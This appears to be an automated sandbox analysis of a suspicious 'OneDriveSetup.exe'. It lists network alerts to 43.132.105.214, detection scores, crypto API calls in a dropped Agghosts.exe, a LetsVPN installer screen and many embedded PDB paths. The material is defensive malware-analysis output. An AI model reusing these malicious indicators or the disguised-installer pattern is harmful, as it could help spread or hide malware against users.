                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7768, ProcessName: svchost.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-04-13T17:48:30.672971+0200 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49722 | 43.132.105.214 | 443 | TCP
                2025-04-13T17:48:20.166016+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49714 | 43.132.105.214 | 443 | TCP

                AV Detection

                Source: OneDriveSetup.exe, Virustotal: Detection: 10%
                Source: Submitted Sample, Neural Call Log Analysis: 99.1%
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_006617EE CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,9_2_006617EE
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00667630 CryptAcquireContextW,CryptAcquireContextW,9_2_00667630
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00662045 CryptDecrypt,SetLastError,SetLastError,SetLastError,SetLastError,SetLastError,GetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,GetLastError,GetLastError,SetLastError,GetLastError,9_2_00662045
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_006646F6 CryptContextAddRef,9_2_006646F6
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_00665137 CryptGenRandom,9_2_00665137
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_006610AA CryptStringToBinaryA,9_2_006610AA
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Code function: 9_2_006628EC CryptStringToBinaryW,MultiByteToWideChar,MultiByteToWideChar,9_2_006628EC
                Source: OneDriveSetup.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

                Compliance

                Source: C:\Users\user\Desktop\OneDriveSetup.exe Unpacked PE file: 0.2.OneDriveSetup.exe.140000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Unpacked PE file: 9.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exe Unpacked PE file: 24.2.Agghosts.exe.10000000.2.unpack
                Source: C:\Users\Public\Videos\bin.exe Window detected: < &Back I &Agree Cancel Nullsoft Install System v3.10 Nullsoft Install System v3.10 License Agreement Please review the license terms before installing letsvpn. Press Page Down to see the rest of the agreement. LetsVPN Terms of Service These Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services). Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services. Intellectual Property Rights The website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved. The Scope of Software Licensing A. Users can install use display and run the software on PC and mobile phones (same account support different devices). B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights. C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service. User Instructions A. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc. B. LetsVPN Account a. You understand that it is your responsibility to keep your LetsVPN account information confidentia
                Source: unknown HTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49714 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 43.132.105.214:443 -> 192.168.2.4:49722 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 4.152.45.219:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: OneDriveSetup.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\build\xra_common\webview_3497\Release_tjfuyun\webview.pdb. source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: Z:\Zemana\Projects\AMSDKCore\Driver\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: Z:\Zemana\Projects\AntiMalware\bin\zam64.pdb source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: bin.exe, 00000017.00000003.1586338671.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: bin.exe, 00000017.00000003.1539910501.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1595737967.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: bin.exe, 00000017.00000003.1641195155.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1560411692.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: bin.exe, 00000017.00000003.1539910501.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: bin.exe, 00000017.00000003.1574111221.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: bin.exe, 00000017.00000003.1638461725.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: bin.exe, 00000017.00000003.1576354512.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: bin.exe, 00000017.00000003.1597771215.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: bin.exe, 00000017.00000003.1628787314.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: bin.exe, 00000017.00000003.1604218262.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: bin.exe, 00000017.00000003.1548032073.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: bin.exe, 00000017.00000003.1557388355.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: bin.exe, 00000017.00000003.1542970100.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.PdbG source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: bin.exe, 00000017.00000003.1553986968.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdb source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: bin.exe, 00000017.00000003.1537619804.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: bin.exe, 00000017.00000003.1510836959.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: bin.exe, 00000017.00000003.1595737967.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: bin.exe, 00000017.00000003.1579812131.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: bin.exe, 00000017.00000003.1602379822.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: bin.exe, 00000017.00000003.1511520441.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: bin.exe, 00000017.00000003.1601628106.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: bin.exe, 00000017.00000003.1545901293.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1572509011.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: bin.exe, 00000017.00000003.1545901293.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: bin.exe, 00000017.00000003.1566880284.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: bin.exe, 00000017.00000003.1644794214.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Cci.Pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: bin.exe, 00000017.00000003.1586338671.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596763609.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: bin.exe, 00000017.00000003.1634271910.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: bin.exe, 00000017.00000003.1543633291.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: bin.exe, 00000017.00000003.1509476332.0000000002739000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.1884979889.0000000000B4D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 00000036.00000000.1873262546.0000000000B4D000.00000002.00000001.01000000.00000018.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: bin.exe, 00000017.00000003.1631006621.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890076416.0000000005C72000.00000002.00000001.01000000.0000001D.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: bin.exe, 00000017.00000003.1537619804.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: bin.exe, 00000017.00000003.1613581369.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: bin.exe, 00000017.00000003.1575833413.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: bin.exe, 00000017.00000003.1643180881.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: bin.exe, 00000017.00000003.1594016654.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: bin.exe, 00000017.00000003.1637794932.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: bin.exe, 00000017.00000003.1616190581.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: bin.exe, 00000017.00000003.1589652681.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: bin.exe, 00000017.00000003.1548032073.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: bin.exe, 00000017.00000003.1560411692.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: bin.exe, 00000017.00000003.1642153652.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: bin.exe, 00000017.00000003.1549496484.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: bin.exe, 00000017.00000003.1612912138.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: bin.exe, 00000017.00000003.1622971525.000000000273D000.00000004.00000020.00020000.00000000.sdmp
